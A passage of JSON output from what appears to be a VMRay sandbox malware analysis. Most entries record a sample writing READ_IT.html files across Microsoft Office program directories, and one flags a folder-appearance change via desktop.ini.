Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_28988", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Swirl\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29146", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\swirl\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\STS2\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29164", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\sts2\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SpringGreen\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29182", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\springgreen\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29196", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\SoftBlue\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29226", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\softblue\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Slate\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slate\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29240", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\slate\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Oasis\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29250", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\oasis\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Lime\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lime\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29264", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\lime\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\GrayCheck\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29274", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\graycheck\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Desert\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29288", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\desert\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightYellow\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29302", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightyellow\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BrightOrange\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29316", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\brightorange\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Biscay\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\biscay\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29334", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\biscay\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\BabyBlue\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29344", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\babyblue\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Americana\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\americana\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29362", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\americana\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29372", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\dataservices\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\DataServices\\DESKTOP.INI", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\desktop.ini", "operations": [ "access" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_masquerade", "category_desc": "Masquerade", "operation": "_change_folder_appearance", "operation_desc": "Change folder appearance", "ref_gfncalls": [ { "ref_id": "gfn_29377", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 2, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_change_folder_appearance", "technique_desc": "Folder \"c:\\program files\\microsoft office\\office14\\1033\\dataservices\" has a changed appearance.", "technique_path": "built_in._masquerade._change_folder_appearance.vmray_change_folder_appearance", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Office14\\1033\\Bibliography\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\office14\\1033\\bibliography\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29390", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\office14\\1033\\bibliography\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\media\\office14\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29397", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\media\\office14\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\media\\office14\\lines\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29403", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\media\\office14\\lines\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\media\\office14\\bullets\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_29694", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\media\\office14\\bullets\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\media\\office14\\autoshap\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_30366", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\media\\office14\\autoshap\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\media\\office14\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_30660", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\media\\office14\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\media\\cagcat10\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_30667", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\media\\cagcat10\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\media\\cagcat10\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_31161", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\media\\cagcat10\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Document Themes 14\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\document themes 14\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_31167", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\document themes 14\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_31325", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\document themes 14\\theme fonts\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Effects\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\document themes 14\\theme effects\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_31495", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\document themes 14\\theme effects\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\document themes 14\\theme colors\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_31653", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\document themes 14\\theme colors\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\Publisher\\Backgrounds\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_31815", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\publisher\\backgrounds\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": 